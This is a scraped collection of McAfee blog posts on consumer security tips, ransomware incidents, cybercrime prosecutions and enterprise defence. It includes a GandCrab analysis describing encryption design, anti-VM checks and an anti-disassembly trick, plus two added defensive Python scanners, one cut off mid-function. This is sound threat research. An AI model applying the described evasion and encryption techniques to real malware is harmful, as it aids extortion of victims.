You’ve loved, shaped, and equipped your child to succeed in college, and move-in day is finally here. But there’s still one variable that can turn your child’s freshman year upside down, and that’s technology.

That’s right, that essential laptop and indispensable smartphone your child owns could also prove to be his or her biggest headache if not secured and used responsibly. College students can be targets of identity theft, malware, online scams, credit card fraud, property theft, and internet addiction.

The other part of this new equation? You, parent, are no longer in the picture. Your child is now 100% on his or her own. Equipping time is over. Weekly tech monitoring and family chats are in the rearview mirror. Will they succeed? Of course, they will. But one last parenting chat on safety sure can’t hurt. Here are a couple of reminders to share with your college-bound kids.

7 Technology Habits for Students

1. Minimize use of public computers. Campuses rely on shared computers. Because campus networks aren’t always secure, this can open you up to identity theft. If you have to log on to a public computer, be it in a cafe, library, or lab, be sure to change any passwords each time you return. If you are working with a study group, don’t share passwords. Public devices can be prone to hackers seeking to steal login credentials and credit card numbers. If you do use public devices, get in the habit of browsing in private mode. Clear browser history and cookies, and quit all applications before logging off.

2. Beware when shopping online. Online shopping is often the easiest way for students to purchase essentials. Be sure to use a secure internet connection when hitting that “purchase” button. Reputable sites encrypt data during transactions by using SSL technologies. Look for the tiny padlock icon in the address bar or a URL that begins with “https” (the “s” stands for secure) instead of “http.” Examine the site and look for misspellings and inconsistencies. Go with your instincts: if you think a website is bogus, don’t risk the purchase. Online credit card fraud is on the rise, so beware.

3. Guard your privacy. College is a tough place to learn that not all people are trustworthy — even those who appear to be friends. Sadly, many kids learn about online theft the hard way. Never share passwords, credit card numbers, or student ID numbers. Be aware of shoulder surfing, which is when someone peers over your shoulder to see what’s on your computer screen. Avoid leaving computer screens open in dorm rooms or libraries where anyone can check your browsing history, use an open screen, or access financial information. Also, never lend your laptop or tablet to someone else, since it houses personal information, and make sure that all of your screens are password protected.

4. Beware of campus crooks. Thieves troll college campuses looking for opportunities to steal smartphones, laptops, wearables, and tablets for personal use or resale. Don’t carry your tech around uncased or leave it unguarded. Conceal it in a backpack. Even if you feel comfortable in your new community, don’t leave your phone even for a few seconds to pick up your food or coffee at a nearby counter. If you are in the library or study lab and need a bathroom break, take your laptop with you. Thieves are swift, and you don’t want to lose a semester’s worth of work in a matter of seconds.

5. Use public Wi-Fi with caution. Everyone loves to meet at the coffee shop for study sessions — and that includes hackers. Yes, it’s convenient, but use public Wi-Fi with care. Consider using VPN software, which creates a secure private network and blocks people from accessing your laptop or activity. To protect yourself, be sure to change your passwords often. This is easy if you use a free password manager like True Key.

6. Social media = productivity killer. Be aware of your online time. Mindless surfing, internet games, and excessive video gaming with roommates can have an adverse effect on your grades as well as your mental health. Use online website blockers to help protect your study time.

7. Social media = career killer. We can all agree: College is a blast. However, keep the party photos and inappropriate captions offline. Your career will thank you. Remember: Most everything you do today is being captured or recorded – even if you’re not the one with the camera. The internet is forever, and a long-forgotten photo can make its way back around when you least expect it.

8. Don’t get too comfortable too fast. Until you understand who you can trust in your new community, consider locking your social media accounts. Disable GPS in mobile apps for security, and don’t share home and dorm addresses, email addresses, or phone numbers. While it may be the farthest thing from your mind right now, campus stalking cases are real.


Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures)

The post College Bound? 7 Important Technology Habits for Students appeared first on McAfee Blogs.

Hackers Tee Up a Ransomware Attack for the PGA Ahead of the 2018 Championship

Fore! That’s not a ball hitting the 9th hole, that’s a ransomware attack. You heard correctly – the PGA (Professional Golfers’ Association) was hit with a ransomware attack this week, just days ahead of its annual championship tournament. Specifically, the attack was on the PGA’s computer servers, and is keeping officials from accessing files, such as numerous PGA banners, logos, and signage, for the PGA Championship 2018.

Though it is not yet known how the crooks were able to get inside the PGA’s system, they have made their motives clear. Per Golfweek’s report, the cybercriminals left a message for the PGA staff, stating, “Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm.” The message went on to threaten, “Any attempt to break the encryption could cause the loss of all of the work. This may lead to the impossibility of recovery of certain files.” They also included a Bitcoin wallet address for the PGA to pay into; however, the organization has yet to put anything in there.

That means, as of now, the PGA is still without access to a few of their promotional materials as their tournament is underway. However, the 2018 championship is still carrying on successfully, as planned.

Now, what can we take away from this situation? The tournament is still running smoothly, even despite the disruption from hackers. So, take a page out of PGA’s book – stand up to cybercriminals and don’t pay the ransom. Beyond not paying the ransom, here are a few additional security tips to follow if you’re ever faced with a ransomware attack on your personal device:

  • Keep your devices up-to-date. Though it’s not exactly known how cybercriminals gained access to the PGA’s systems, usually, ransomware attacks depend on a known vulnerability. So, make sure you update your devices’ software early and often, as patches for flaws are typically included in each update.
  • Do a complete backup. With ransomware attacks locking away crucial data, you need to back up the data on all of your machines. If a machine becomes infected with ransomware, there’s no promise you’ll get that data back – it could even become wiped entirely in some cases. Therefore, make sure you cover all your bases and have your data stored on an external hard drive or in the cloud.
  • Use decryption tools. No More Ransom, an initiative McAfee is a part of, has a suite of tools to free your data, each tailored for a specific type of ransomware. If your device gets held for ransom, start by researching what type of ransomware it is. Then check out No More Ransom’s decryption tools and see if one is available for your specific strain of ransomware.
  • Use comprehensive security. To be prepared for ransomware or any other type of cyberattack that may come your way, it’s important you lock down all your devices with an extra layer of security. To do just that, use a comprehensive security solution.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Hackers Tee Up a Ransomware Attack for the PGA Ahead of the 2018 Championship appeared first on McAfee Blogs.

Three men arrested for stealing over 15 million payment cards

US officials announced today that three alleged leaders of the cybercrime group known alternatively as Fin7, Carbanak and the Navigator Group have been arrested in Germany, Poland and Spain and charged with 26 felony counts. The charges include conspiracy, wire fraud, computer hacking, access device fraud and aggravated identity theft. The Department of Justice alleges that Fin7 members have targeted more than 100 US companies, hacked thousands of computer systems and stolen 15 million credit and debit card numbers. The group is said to have breached networks in 47 states and Washington, DC and hacked 6,500 point-of-sale terminals at over 3,600 business locations.

Source: Department of Justice

GandCrab Ransomware Puts the Pinch on Victims

Update: On August 9 we added our analysis of Versions 4.2.1 and 4.3. 

The GandCrab ransomware first appeared in January and has been updated rapidly during its short life. It is the leading ransomware threat. The McAfee Advanced Threat Research team has reverse engineered Versions 4.0 through 4.3 of the malware.

The first versions (1.0 and 1.1) of this malware had a bug that left the keys in memory because the author did not correctly use the flags in a crypto function. One antimalware company released a free decryption tool, posted on NoMoreRansom.org, with the help of Romanian police and Europol.

The hack of the GandCrab servers was confirmed by the malware author in a Russian forum:

Figure 1. Confirmation by the author of the hack of GandCrab servers.

The text apologizes to partners for the hack and temporarily shuts down the program. It promises to release an improved version within a few days.

The second version of GandCrab quickly appeared and improved the malware server’s security against future counterattacks. The first versions of the ransomware had a list of file extensions to encrypt, but the second and later versions have replaced this list with an exclusion list. All files except those on the list were encrypted.

Old versions of the malware used RSA and AES to encrypt the files, and communicated with a control server to send the RSA keys locked with an RC4 algorithm.

The GandCrab author has moved quickly to improve the code and has added comments to mock the security community, law agencies, and the NoMoreRansom organization. The malware is not professionally developed and usually has bugs (even in Version 4.3), but the speed of changes is impressive and increases the difficulty of combating it.

Entry vector

GandCrab uses several entry vectors:

  • Remote desktop connections with weak security, or access bought in underground forums
  • Phishing emails with links or attachments
  • Trojanized legitimate programs containing the malware, or downloading and launching it
  • Exploit kits such as RigEK and others

The goal of GandCrab, as with other ransomware, is to encrypt all or many files on an infected system and insist on payment to unlock them. The developer requires payment in cryptocurrency, primarily DASH, because it is complex to track, or Bitcoin.

The malware is usually but not always packed. We have seen variants in .exe format (the primary form) along with DLLs. GandCrab is effectively ransomware as a service; its operators can choose which version they want.

Version 4.0

The most important change in Version 4.0 is in the algorithm used to encrypt files. Earlier versions used RSA and AES; the latest versions use Salsa20. The main reason is for speed. RSA is a powerful but slow algorithm. Salsa20 is quick and the implementation is small.

The ransomware checks the language of the system and will not drop the malicious payload if the infected machine operates in Russian or certain other languages of former Soviet countries:

Figure 2. Checking the language of the infected system.

GandCrab encrypts any file that does not appear on the following file-extension exclusion list:

The ransomware does not encrypt files in these folders:

GandCrab leaves these files unencrypted:

The ransomware generates a pair of RSA keys before encrypting any file. The public key encrypts the Salsa20 key and random initialization vector (IV, or nonce) generated later for each file.

The encryption procedure generates a random Salsa20 key and a random IV for each file, encrypts the file with them, and encrypts this key and IV with a pair of RSA keys (with the public RSA key created at the beginning). The private key remains encrypted in the registry using another Salsa20 key and IV encrypted with an RSA public key embedded in the malware.

After encryption, the file key and IV are appended to the contents of the file in a new field of 8 bytes, increasing the original file size.

This method makes GandCrab very strong ransomware because without the private key to the embedded public key, it is not possible to decrypt the files. Without the new RSA private key, we cannot decrypt the Salsa20 key and IV that are appended to the file.

Finally, the ransomware deletes all shadow volumes on the infected machine and deletes itself.

Version 4.1

This version retains the Salsa20 algorithm, fixes some bugs, and adds a new function. This function picks domains from a big list using a random procedure, creates a final path for each, and sends the encrypted information gathered from the infected machine to it. We do not know why the malware does this; the random procedure usually creates paths to remote sites that do not exist.

For example, one sample of this version has the following hardcoded list of encrypted domains. (This is only a small part of this list.)

The ransomware selects one domain from the list and creates a random path with one of these words:

Later it randomly chooses another word to add to the URL it creates:

Afterward it makes a file name, randomly choosing three or four combinations from the following list:

Finally the malware concatenates the filename with a randomly chosen extension:

At this point, the malware sends the encrypted information using POST to the newly generated URL for all domains in the embedded list, repeating the process of generating a path and name for each domain.

Another important change in this version is the attempt to obfuscate the calls to functions such as VirtualAlloc and VirtualFree.

Figure 3. New functions to obfuscate the code.

Version 4.1.2

This version has appeared with some variants. Two security companies revealed a vaccine to prevent infections by previous versions. The vaccine involved making a special file in a folder with a special name before the ransomware infects the system. If this file exists, the ransomware finishes without dropping the payload.

The file gets its name from the serial number of the Windows logical drive. The malware makes a simple calculation with this value and creates the file in the %appdata% or %program files% folder (depending on the OS) with the extension .lock.

Figure 4. Creating the special file.

The GandCrab author reacted quickly, changing the calculation to make this value unique and applying the Salsa20 algorithm, with an embedded key and IV, to text referring to these companies. The text and the calculated value were used to make the filename; the extension remained .lock.

One of the security companies responded by releasing a free tool that creates this file for all users, but within hours the author released another Version 4.1.2 with the text changed. The malware no longer creates any file; instead it creates a mutex object with this special name. The mutex name still carries the .lock extension.


Figure 5. Creating a special mutex instead of a special lock file.

The vaccine does not work with the second Version 4.1.2 and Version 4.2, but it does work with previous versions.

Version 4.2

This version has code to detect virtual machines and stop running the ransomware within them.

It checks the number of remote drives, compares the length of the running ransomware’s filename against certain values, installs a VectoredExceptionHandler, and checks for VMware virtual machines using the old trick of querying the VMware I/O port inside a small encrypted shellcode:

Figure 6. Detecting VMware.

The malware calculates the free space on the logical drive holding the main Windows installation and finally computes a value from it.

If this value is correct for the ransomware, it runs normally. If the value is less than 0x1E, it waits one hour before starting the normal process. (This defeats automated analysis systems that are not prepared to wait through a “sleep.”) If the value is greater than 0x1E, the ransomware finishes its execution.

Figure 7. Checking for virtual machines and choosing a path.

Version 4.2.1

This version appeared August 1. The change from the previous version is a text message to the company that made the vaccine, along with a link to the source code of a zero-day exploit that attacks one of this company’s products. The code is a Visual Studio project and can be easily recompiled; its folder names appear in Russian when the project is loaded in Visual Studio.

Version 4.3

This version also appeared August 1. It has several changes from previous versions.

  • It removes the code to detect virtual machines, along with a few other oddities of Version 4.2. That code had some failure points; some virtual machines could not be detected.
  • It implements an exploit against one product of the antivirus company that made the vaccine for Version 4.0 through the first release of Version 4.1.2. This code runs after the malware encrypts files and before it deletes itself.

Figure 8. Running an exploit against a product of the company that made a vaccine.

  • New code in some functions makes static analysis with Interactive Disassembler more complex. This is an easy but effective trick: the ransomware makes a delta call (which puts the address of the delta offset at the top of the stack) and adds 0x11 (the size of the special code block, which suggests the malware author is using a macro) to the value in the ESP register. ESP now points to an address after the block of special code, and the code jumps into the middle of the opcodes of this block. Entering the block mid-way makes the bytes decode as a different instruction, in this case “pop eax,” which pops the value adjusted by 0x11 from the top of the stack (ESP register). The code then makes an unconditional jump to this address in EAX, and the ransomware continues its normal code flow.

Figure 9. New code to make static analysis more difficult.

Conclusion

GandCrab is the leading ransomware threat for any person or enterprise. The author uses many ways to install it—including exploit kits, phishing mails, Trojans, and fake programs. The developer actively updates and improves the code to make analysis more difficult and to detect virtual machines. The code is not professionally written and continues to suffer from bugs, yet the product is well promoted in underground forums and has increased in value.

McAfee detects this threat as Ran-GandCrab4 in Versions 4.0 and later. Previous ones are also detected.

Indicators of compromise

MITRE ATT&CK

This sample uses the following MITRE ATT&CK techniques:

  • File deletion
  • System information discovery
  • Execution through API
  • Execution through WMIC
  • Application process discovery: to detect antimalware and security products as well as normal programs
  • Query registry: to get information about keys that the malware needs to create or read
  • Modify registry
  • File and directory discovery: to search for files to encrypt
  • Encrypt files
  • Process discovery: enumerating all processes on the endpoint to kill some special ones
  • Create files
  • Elevation of privileges

Hashes


Domain

http://gandcrabmfe6mnef.onion

The post GandCrab Ransomware Puts the Pinch on Victims appeared first on McAfee Blogs.

Six Things your Enterprise Needs to Learn from the DNC Hacking Indictment

All politics aside, the United States Department of Justice on Friday unsealed a judicial indictment against a number of individuals alleged to be from Russia’s intelligence services engaged in activities in 2016.

Stepping outside of the context of this party or that party, and politics as a whole – McAfee’s CTO, Steve Grobman noted, “Attribution is amongst the most complex aspects of cyberwar and the US government is in a unique position to make this attribution assessment. Technical forensics combined with information from trusted intelligence or law enforcement agencies are needed to provide confidence behind identifying actors in an attack or campaign. These indictments clearly show the US has reason to believe Russia interfered with the election process.”

The level of technical detail also offers practical insight for aspects of organizations’ readiness to react to the threat environment.

1) Nation State Activity is Real

At McAfee, we operate our own Advanced Threat Research team. We employ many professionals whose entire job is to find ways to break things, to learn how others have already broken things, and to decide on the level of risk this represents to our customers and future customers. Our hope is that our activity is non-disruptive, ethically conducted, and consistent with our corporate values and our commitments to our customers. In today’s threat environment, countries throughout the globe are investing in cyber capabilities to practice intelligence, deception, and counterintelligence, and in the past few years we have documented the crossover from cyber capability into kinetic effects.

Whether one service’s actions versus another’s are perceived as “good” or “bad”, as a “criminal conspiracy” or as “policy”, involves many factors and points of view; as a profession, it is critical that we recognize this rapidly growing reality for the fact that it is.

This judicial action is another breadcrumb reminding us, as enterprise leaders, that sophisticated adversaries bring real resources to bear, especially against enterprises involved in services to organizations of public importance. Organizations should evaluate their customer base and the services they provide for relative risks. Risk has upside opportunity (“revenue”) but should also prompt internal questions as to whether an organization, or a subset of it, requires advanced security controls or more proactive threat detection and resistance measures.

2) Geo-Location is Practically Irrelevant

For many professionals engaged in the early days of information security, we could leverage aspects of connection metadata to make snap judgements about the trustworthiness of requests. The days of first-jump relays to command and control servers sitting in a given country’s public IP space or under a two-letter country-associated domain are mostly over.

Instead, the organization needs to transition, looking more directly at the behavior of not just users, but of systems, and the access of resources. At McAfee, we have evolved our own offerings in this space to establish McAfee Behavioral Analytics to discern elevated risks that break established patterns and to put advanced tools like McAfee Investigator in the hands of threat hunters.

Whether using our products or not, today’s enterprise needs to rely on security behaviors that do not look for traditional geographic or demographic identifiers as a means of making a strong determination of trust for access and/or threat identification.

When it comes to identity misuse, multi-factor authentication should be implemented wherever possible, with a decreased emphasis on means that are easily open to interception by opponents (like SMS-based message codes). YubiKey, TOTP-based generators, and interactive application confirmation by providers like Duo Security are all effective measures that make it more difficult to use credentials intercepted or cajoled from end users by other means.

3) URL Shorteners can be a Risk Indicator

While for many organizations – especially in the realm of social media analytics – the use of URL shorteners has enabled short-format messaging with business intelligence potential, they are often a means to obscure potentially malicious targets. The indictment released by the United States Department of Justice highlights the continuing threat that the combination of URL shortening and the user-focused technique of spear phishing continues to present as a means to attack the enterprise.

Aside from education campaigns to help users distinguish legitimate links and to help them become more sensitive to the risk, the organization can also consider web access methods for greater control and recognition of potential threats.

User and Entity Behavior Analytics (UEBA) systems can identify outlier websites not otherwise accessed at the organization, and the presence or use of unknown URL shorteners can itself be a risk indicator. The security operations team may want to track the identification and risk management of particular URL shorteners over time, to determine which become commonly seen in the organization’s recent incidents and thus could or should be managed in email and web access hygiene.
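The two signals above, unknown shorteners and outlier destinations, can be tagged directly from proxy logs. The following is an added example (not McAfee code, and not a UEBA product) that goes one step beyond the text by also pairing the two signals: a user whose shortener click is immediately followed by a first-seen destination. The shortener list, the approved set, the baseline and the log format are assumptions made for this example.

```python
"""Risk tagging of web requests: unapproved URL shorteners, first-seen
destinations, and shortener-then-new-site chains.

Added example, not McAfee code. The shortener list, approved set, baseline
and log format are assumptions for this example.
"""
from urllib.parse import urlsplit

# Assumed: a few well-known public shortener domains; extend the set from your
# own incident history, as the text suggests.
KNOWN_SHORTENERS = {"bit.ly", "t.co", "tinyurl.com", "goo.gl", "ow.ly", "is.gd"}
# Assumed: shorteners the business has explicitly approved (e.g. marketing's).
APPROVED_SHORTENERS = {"t.co"}
# Constructed baseline: destinations seen from the organization in past weeks.
BASELINE_DOMAINS = {"www.example.com", "login.example.com", "t.co", "cdn.example.net"}

# Constructed proxy log lines: "<ISO timestamp> <user> <method> <url> <status>".
SAMPLE_LOG = """\
2016-03-19T09:12:04 alice GET https://www.example.com/news 200
2016-03-19T09:12:40 alice GET https://t.co/abc123 301
2016-03-19T09:13:02 bob GET https://bit.ly/2xyz987 301
2016-03-19T09:13:03 bob GET https://accounts-security-alert.example/reset?u=bob 200
2016-03-19T09:14:10 carol GET https://cdn.example.net/logo.png 200
2016-03-19T09:15:22 dave GET https://is.gd/q1w2e3 301
"""


def host_of(url):
    """Lower-cased hostname of a URL (empty string if none)."""
    return (urlsplit(url).hostname or "").lower()


def classify(url, baseline=BASELINE_DOMAINS):
    """Return risk tags for one URL; an empty list means nothing notable."""
    host = host_of(url)
    tags = []
    if host in KNOWN_SHORTENERS and host not in APPROVED_SHORTENERS:
        tags.append("unapproved-shortener")
    if host not in baseline:
        tags.append("new-destination")
    return tags


def scan_log(log_text, baseline=BASELINE_DOMAINS):
    """Return (findings, chained_users).

    findings: list of (user, host, tags) for every request with a tag.
    chained_users: users whose request right after any shortener click went
    to a destination absent from the baseline, i.e. the shortener plus
    spear-phishing pattern the indictment describes.
    """
    findings = []
    last_host = {}          # per-user host of the previous request
    chained_users = set()
    for line in log_text.strip().splitlines():
        _ts, user, _method, url, _status = line.split()
        host = host_of(url)
        tags = classify(url, baseline)
        if tags:
            findings.append((user, host, tags))
        if last_host.get(user) in KNOWN_SHORTENERS and "new-destination" in tags:
            chained_users.add(user)
        last_host[user] = host
    return findings, sorted(chained_users)


if __name__ == "__main__":
    findings, chained = scan_log(SAMPLE_LOG)
    for user, host, tags in findings:
        print(f"{user} -> {host}: {', '.join(tags)}")
    print("shortener followed by first-seen destination:", chained)
```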

4) Vulnerability Management is a Key Risk Mitigation

I’ve never known a security professional who skips into the office with their coffee and announces, “I love patching servers.” Never. As experienced security leaders, we know how hard it can be to manage the impact to production systems, to identify system owners, to work together to maintain a cadence of patching. Sometimes, even just the heterogeneous nature of the modern operating environment can be its own challenge!

The alleged activity of the identified conspirators reminds us how critical the public attack surface remains to protecting the enterprise as a whole. Try as we might, each of our public infrastructures will maintain a footprint. We “leak” details of our enterprise systems as a necessary byproduct of making those systems technically operable: DNS records, public IP block ownership, routing advertisements, job listings, employee CVs, employee social media profiles.

Vulnerability management requires an organization to think about more than patching.  Your organization’s threat surface has to be considered in a broader sense to manage holistic threat consideration and remediation.  The organization can also use public models as a means to check the organization’s readiness to defend against new vulnerabilities ahead of patching or other long-term remediation.

5) Response Threat Hunting is Hard – Trust Nothing

Despite the best efforts of technical security teams, sometimes intelligence and cues are missed. The reality is that sophisticated adversaries have sophisticated skills and multiple means to stay engaged. They also have reason and/or desire to hide from security teams. As security professionals, we have to put personal ego and hubris aside. Threat hunting in an incident is a time for humble approaches that recognize the adversaries are at or above our own skill level (and hope that is not the case).

In such a case, we go back to a few core fundamentals: we trust nothing. We require validation for everything. Each piece of intelligence goes into the picture and through our tools to identify additional leads to pursue, and is evaluated for the remediation actions it makes possible. While we have talked at length before about the cyber kill chain, a fundamental truth illustrated by today’s Department of Justice action is that where advanced activity occurs, the entire environment needs to be treated as suspect and moved to zero trust.

Can you force each network flow to be validated for a time? Can someone from the organization vouch for a piece of software or a specific node on the network? Do your pre-work ahead of time to create the space so that when the company brand is on the line, you can use maintenance windows, incident response policies, and similar corporate buffers to buy the “right” to shut down a segment, temporarily block a network flow and see what happens, and so on.

6) Your organizational data is in the cloud. Your Incident Response needs to be, too.

The cloud was a key avenue through which the organizations compromised in these activities continued to lose information. Indications are that when the compromised identities and the initial incident were addressed “on premise”, the cloud systems were not connected to those changes.

Your organization has leveraged the advanced capability and time to market of the cloud. Our recent survey of organizations worldwide indicates that the typical enterprise-class organization has dozens of distinct providers hosting corporate data. Just as the sensitive information stored with those providers is part of your brand value and your delivery strategy, your response plans need to integrate intelligence from those providers, and to those providers, for investigation and mitigation.

Building unified visibility across cloud providers requires a deliberate approach and investment from the organizations.  Incident response procedures should include looking at cloud sources for activity from potential Indicators of Compromise, as well as an incident step of considering what actions are needed to manage the risk in cloud providers.

Your cloud is part of your holistic data and threat stance; it also needs to be part of your remediation and resilience plan.

Nation State Actors Remind us of the Fundamentals

The indictment released by the United States Department of Justice describes a multi-faceted effort that involved target research, user-focused phishing, exploiting vulnerable software, malware, and making use of the disconnect between on-premise and cloud management.

For literally years, McAfee has focused on a platform approach to security in our products.  We offer software with advancements like OpenDXL and an actively managed ecosystem of Security Innovation Alliance offerings.  We make these investments for the simple reason that in order to protect and adapt to continuing threats, your organization needs rapidly available, actionable intelligence.  Your organization’s approach to information security should return periodically to verify fundamental information sharing and basic controls, even as advanced capabilities are implemented.

 

The post Six Things your Enterprise Needs to Learn from the DNC Hacking Indictment appeared first on McAfee Blogs.

Family Tech Check: 5 Ways to Help Kids Balance Tech Over Summer Break

It’s mind-blowing to think that when you become a parent, you have just 18 summers with your child before he or she steps out of the mini-van and into adulthood. So at the mid-summer point, it’s a great time to ask: How balanced is your child’s screen time?

Don’t panic: it’s normal for screen time to spike over the summer months, which is why kids need to know not only how to balance their screen time but also why it matters.

Besides impacting family time and relationships, excessive screen time carries other potential risks such as obesity, depression, technology addiction, and anxiety. There are also online risks: privacy, cyberbullying, inappropriate content, and predators. So, while summer brings fun, it also requires parents to be even more diligent, and creative, when it comes to helping kids achieve some degree of balance with their tech.

A Small, Powerful Step

Kids are connected. Forever. There’s no going backward. Not all changes take a huge effort. Small changes matter.

Try this one small but powerful change. Turn your phone over whenever anyone in your family enters a room or begins talking to you. The simple act of turning our screens face down and looking at the person speaking strengthens the family dynamic. Try it; you might experience some of the same results we did. The kids may stick around and talk longer. Your spouse may feel more respected. And, most importantly, you won’t miss the priceless smiles, expressions, laughter, and body language that come with eye contact and being fully present with the people who mean the most.

Another small step is agreeing to screen free zones (this includes TV) such as the dinner table, restaurants, and during family outings. Again, this one small step might open up a fresh, fun family dynamic.

If you feel your summer slip sliding away and need to seriously pull in the tech reins, these five tips may help.

5 Ways to Help Curb Summer Tech

  1. Create summer ground rules. Include your kids in this process and come up with a challenge rather than a list of rules. Ground rules for summer might look different from the rest of the year, depending on your family’s schedule. Establishing a plan for chores, exercise, reading and waking up, puts expectations in place. To keep the tech in check, consider a tech exchange. For every hour of screen time, require your child to do something else productive. Keep it fun: Set up a reward system for completed chores.
  2. Get intentional with time. Carving out time to be together in our tech-driven world requires intentionality. Try sitting down together and making a summer bucket list for the remainder of the summer. Try your hand at fishing, canoeing, or hiking some new trails together. Board games, crafts, puzzles, a family project are also ways to make great memories.
  3. Keep up with monitoring. Just because it’s summer doesn’t mean monitoring of online activity can go by the wayside. Keep up with your child’s favorite apps and understand how he or she is using them. During summer especially, know the friends your kids connect with online. Review privacy and location settings. Note: Kids, especially teens, want their friends to know what they are doing and where they are at all times in hopes of finding something to do over the summer. This practice isn’t always a good idea, since location-based apps can open your family up to risks.
  4. Consider a tech curfew. Establish a “devices off” rule starting an hour before lights out. This won’t be a favorite move, but then again, parenting well isn’t always fun. More and more studies show the physical toll excessive technology use can take on teens. Just because your child is in bed at night does not mean he or she is asleep. The ability to face time, text, watch movies, or YouTube videos can zap kids of valuable sleep.
  5. Maintain a balanced perspective. Kids and tech are intertwined today, which makes it nearly impossible to separate the two. Sure the risks exist, but there’s the upside of tech that brings values that echo throughout every generation: Friendship, connection, and affirmation. Checking social media and sharing one’s thoughts and life online is a regular part of growing up today. Keep this in mind as you work together to find the balance that works best for your family.


 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures).

The post Family Tech Check: 5 Ways to Help Kids Balance Tech Over Summer Break appeared first on McAfee Blogs.

What Drives a Ransomware Criminal? CoinVault Developers Convicted in Dutch Court

How often do we get a chance to learn what goes on in the minds of cybercriminals? Two members of McAfee’s Advanced Threat Research team recently did, as they attended a court case against two cybercriminal brothers.

The brothers, Dennis and Melvin, faced a judge in Rotterdam, in the Netherlands. This case was one of the first in the world in which ransomware developers appeared in court and were convicted for creating and spreading ransomware.

They were responsible for creating the ransomware families CoinVault and BitCryptor. CoinVault, the better known of the two, made its appearance in late 2014. The technically skilled programmers had examined the source code of CryptoLocker, the notorious ransomware family that first struck in 2013. The brothers were not very impressed and agreed that they could do a better job. What might have started out as a fun technical challenge turned into a criminal business.

The CoinVault and BitCryptor campaigns were not as widespread as CTB-Locker, CryptoWall, or Locky ransomware campaigns. Nor did they profit as much from it, but this case is nevertheless uncommon. It is rare that the developers of ransomware are caught, let alone confess their crimes. This case gives us an opportunity to understand what drove them down a path to cybercrime.

The challenge

Why would someone write malicious code and infect thousands of people? The judge asked the brothers the same question. Their response was “Because it was a technical challenge.” “But didn’t you realize you were dealing with people?” the judge responded. Both brothers answered that they did not; they were dealing with computers and never met their victims face to face.

The judge and prosecutor did not accept their explanation. CoinVault had a built-in helpdesk function to communicate directly with victims, thus registering their pleas. The brothers’ standard reaction was merciless: “Just pay the money; otherwise we won’t decrypt.” According to the prosecutor, they had plenty of opportunities to see the consequences of their actions but chose to ignore them for money.

At the trial they said they were sorry and tearfully regretted what they had done. But were these mere crocodile tears because they got caught? During CoinVault’s lifespan, several versions of the ransomware were released. Every new version was a reaction to blogs written by security researchers and takedowns performed by law enforcement. Instead of realizing that they were making a mistake and stopping, the brothers saw it as a challenge, a digital game of cat and mouse, and constantly improved their malicious code.

Their continuing to improve the ransomware shows a lack of empathy with their victims. Was there no one in their social surroundings who could straighten their moral compasses and talk sense into them?

The payment

A ransomware criminal must decide the amount of ransom to charge. Generally the more targeted a ransomware attack is, the higher the ransom demand will be. CoinVault’s infections were not targeted at one organization; they charged only US$250. The two brothers explained that they chose that price to be low enough for an average person to pay while still making a good profit. The prosecutor remarked ironically that they were “very noble [to keep] their ransom demand affordable.”

The infection

The two brothers did not directly infect their victims with ransomware; they took a multistep approach. Their distribution method was via newsgroup channels. They hooked a small piece of malicious code to known software or license-key generators before posting the software packages on the newsgroups. Once victims installed the package or ran the key generator, they became part of a botnet through software the brothers named Comhost, which can record keystrokes, search for credentials, and steal Bitcoin wallets. Comhost can also upload and execute binaries received from the control server, which they named Sonar. (We believe Sonar is a modified version of the popular Solar botnet software.)

The Sonar botnet panel.

Once they had accumulated enough bots, they simply pushed CoinVault to all their victims and locked thousands of computers at once. This method made it hard for victims to figure out how they were attacked, because weeks could pass between the initial infection and the encryption. By spreading their ransomware via newsgroups with pirated software, they discouraged victims from going to the police out of fear of prosecution and copyright-violation fines.

The CoinVault lock screen.

The arrest

In April 2015, the National High Tech Crime Unit of the Dutch Police seized the control servers for CoinVault. After the police investigated, the two brothers, aged 18 and 22 at the time, were arrested in Amersfoort, Netherlands, on September 14, 2015. Systems were infected not only in the Netherlands, but also in the United States, Germany, France, and the United Kingdom. Their mistakes? Using flawless Dutch in the ransom notes, and one time not using a Tor connection to log in to their control server, instead using their home connection.

Flawless Dutch in the ransomware code.

Although they used an obfuscator tool (Confuser) for their code, in some of the samples the full name of one of the authors was present, because they did not clean up the debugging path.

Example:

 c:\Users\**********\Desktop\Coinvault\coinvault-cleaned\obj\Debug\coinvault.pdb
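The debugging path above is a CodeView record that the compiler writes into the PE file's debug directory and that obfuscators such as Confuser leave untouched. As an added example (not code from the page or from the CoinVault analysis), the following Python scans a binary for the two CodeView layouts, "RSDS" (GUID, age, path) and the older "NB10" (offset, timestamp, age, path), pulls out each null-terminated .pdb path, and extracts the account name from a Windows profile path. The embedded sample bytes, user name, project path and GUID are constructed for the example; the real path on the page is redacted and is not reproduced here.

```python
import re
import struct
import uuid
from typing import List, Optional, Tuple

# Constructed sample binary: filler bytes with one RSDS and one NB10 CodeView
# record. The user name, project path and GUID are invented for this example.
SAMPLE_BINARY = (
    b"\x00" * 16
    + b"RSDS"
    + uuid.UUID("12345678-1234-5678-1234-567812345678").bytes_le   # PDB GUID
    + struct.pack("<I", 3)                                          # age
    + b"c:\\Users\\alice\\Desktop\\Coinvault\\obj\\Debug\\coinvault.pdb\x00"
    + b"\x00" * 8
    + b"NB10"
    + struct.pack("<III", 0, 0x5A6B7C8D, 1)                         # offset, timestamp, age
    + b"D:\\build\\legacy\\legacy.pdb\x00"
)

# Bytes between the 4-byte signature and the path:
# RSDS = GUID(16) + age(4); NB10 = offset(4) + timestamp(4) + age(4)
CODEVIEW_HEADERS = {b"RSDS": 16 + 4, b"NB10": 4 + 4 + 4}

# Windows profile directories: the first path component after them is the account name.
USER_DIR_RE = re.compile(r"(?i)^[a-z]:\\(?:users|documents and settings)\\([^\\]+)\\")


def find_pdb_paths(data: bytes) -> List[Tuple[str, str]]:
    """Signature-scan for CodeView records and return (format, pdb_path) pairs."""
    found = []
    for sig, header_len in CODEVIEW_HEADERS.items():
        pos = 0
        while (idx := data.find(sig, pos)) >= 0:
            pos = idx + len(sig)
            start = idx + len(sig) + header_len
            end = data.find(b"\x00", start)
            if end < 0:
                break
            try:
                path = data[start:end].decode("ascii")
            except UnicodeDecodeError:
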